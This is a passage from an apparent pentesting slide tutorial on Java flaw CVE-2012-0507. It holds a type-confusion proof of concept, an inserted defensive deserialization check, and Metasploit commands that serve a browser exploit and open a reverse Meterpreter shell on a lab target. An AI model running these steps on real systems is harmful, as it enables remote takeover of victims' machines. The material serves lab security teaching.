CVE-2012-0507 is a vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the wrapped array is of the expected Object[] type. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.
3. About CVE-2012-0507
A vulnerability in the JRE due to the fact that the AtomicReferenceArray class implementation did not properly check whether the array is of the expected Object[] type. The vulnerability was found by Jeroen Frijters.
A malicious Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or bypass Java sandbox restrictions.
5.
    import java.util.concurrent.atomic.*;

    // Empty marker type, used only to show the element-type confusion.
    class first
    {
    }

    // Save as violateClass.java; the public class name must match the file name.
    public class violateClass
    {
        public static void main(String a[])
        {
            Object obj = new first();
            // The wrapped array is really a first[], but the wrapper treats it as Object[].
            AtomicReferenceArray r = new AtomicReferenceArray(new first[1]);
            obj = "Hell";
            // On a vulnerable JRE this stores a String into a first[] slot without the usual array-store check.
            r.set(0, obj);
            // Reading the element back as a first is where type safety is violated.
            first f = (first) r.get(0);
        }
    }
6. Exploiting
By manually constructing a serialized object graph you can place any array you want into an AtomicReferenceArray instance and then use the AtomicReferenceArray.set() method to write an arbitrary reference into it, violating type safety.
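The defensive side of slides 3 and 6, as an added Java example that is not part of the original deck or of the JDK: a hypothetical stand-in class (GuardedRefArray, with my own of(), wrapWithoutCopy() and roundTrip() helpers) that copies the wrapped array to a real Object[] on construction and rejects any deserialized instance whose array field is not exactly Object[], which is the check the vulnerable implementation lacked.

```java
import java.io.*;
import java.util.Arrays;

// Hypothetical stand-in for AtomicReferenceArray's serialized form; not JDK code.
final class GuardedRefArray implements Serializable {
    private static final long serialVersionUID = 1L;
    private Object[] array;

    private GuardedRefArray() {}

    // Patched pattern: always own a real Object[], whatever array subtype the caller passed.
    static GuardedRefArray of(Object[] initial) {
        GuardedRefArray r = new GuardedRefArray();
        r.array = Arrays.copyOf(initial, initial.length, Object[].class);
        return r;
    }

    // Pre-patch pattern (no copy), kept only to produce a stream carrying a narrower array type.
    static GuardedRefArray wrapWithoutCopy(Object[] initial) {
        GuardedRefArray r = new GuardedRefArray();
        r.array = initial;
        return r;
    }

    // Plain stores still get the JVM's ArrayStoreException check; the real class used Unsafe, which skips it.
    void set(int i, Object v) { array[i] = v; }
    Object get(int i) { return array[i]; }

    // Validate the restored field before any set()/get() can run against it.
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        if (array == null || array.getClass() != Object[].class)
            throw new InvalidObjectException("array must be exactly Object[], got "
                    + (array == null ? "null" : array.getClass().getName()));
    }

    static GuardedRefArray roundTrip(GuardedRefArray r) throws IOException, ClassNotFoundException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(r); }
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            return (GuardedRefArray) ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        GuardedRefArray ok = roundTrip(GuardedRefArray.of(new String[1]));
        ok.set(0, Integer.valueOf(42));   // fine: the backing array really is Object[]
        System.out.println("copy-on-construct survives round trip: " + ok.get(0));
        try {
            roundTrip(GuardedRefArray.wrapWithoutCopy(new String[1]));   // field is a String[] on the wire
        } catch (InvalidObjectException e) {
            System.out.println("rejected on deserialization: " + e.getMessage());
        }
    }
}
```

Running `java GuardedRefArray` prints the successful round trip first and then the rejection message for the stream whose array field is a String[].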
10. Preparing Target Machine
Start the "Target" machine.
Install the JRE 6. (I have already installed the JRE.)
11. Preparing Attacker Machine
Now, start the BT5.
Open the Terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits.
12. Open the Terminal and type msfconsole.
Now type:
use exploit/multi/browser/java_atomicreferencearray
The above command selects the java_atomicreferencearray.rb module for the attack.
13. Now type "show options" to display the settings available and/or required for this specific module.
14. set SRVPORT 80
set URIPATH /
set SRVHOST [Backtrack_ip]
How to get the IP of Backtrack:
○ Open the Terminal
○ Type ifconfig
○ It will display the IP
15. Payload
Type "show payloads". This will display the list of payloads available to use.
I am going to use the reverse_tcp payload.
This payload makes the Target open a reverse TCP connection back to our machine.
Type set payload java/meterpreter/reverse_tcp
16. In order to get the reverse connection, we have to set the Backtrack IP as LHOST.
So type the following command:
set LHOST [Backtrack_IP]
18. We have set up everything needed for the exploit. So it is time to break into the Target machine.
Type "exploit" in the msfconsole.
19. This will start the reverse handler on our machine and wait for anyone to connect to our HTTP server (e.g. http://192.168.56.102).
Once the victim connects to our server, it sends a jar file that exploits the CVE-2012-0507 vulnerability.
20. Victim side
We have set up our exploit. Let us see what happens when our victim opens our URL.
Go to the "Target" VM.
Open Firefox.
Enter the URL you got from the Metasploit exploit:
Eg: http://192.168.56.102
No need to care about the '80' in the URL because it is the default port.
21. It loads nothing, but in the background:
Backtrack sends a jar file and exploits the vulnerability.
After a successful exploit, control is handed to Backtrack.
22. Now type "sessions" in the Metasploit console; this will display the list of active sessions (the victim list).
23. Type "sessions -i 1"; this will open the connection to the session with id '1' and bring you to Meterpreter.
Meterpreter lets you interact with and control the Target.
24. Exploited in the Wild
In April 2012, research conducted by Dr.Web determined that more than 600,000 Mac computers were infected with the BackDoor.Flashback botnet.
Included in exploit kits.
25. I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability.
I hope this will help you to get into the PenTesting world!
For more PenTesting tutorials:
www.BreakTheSecurity.com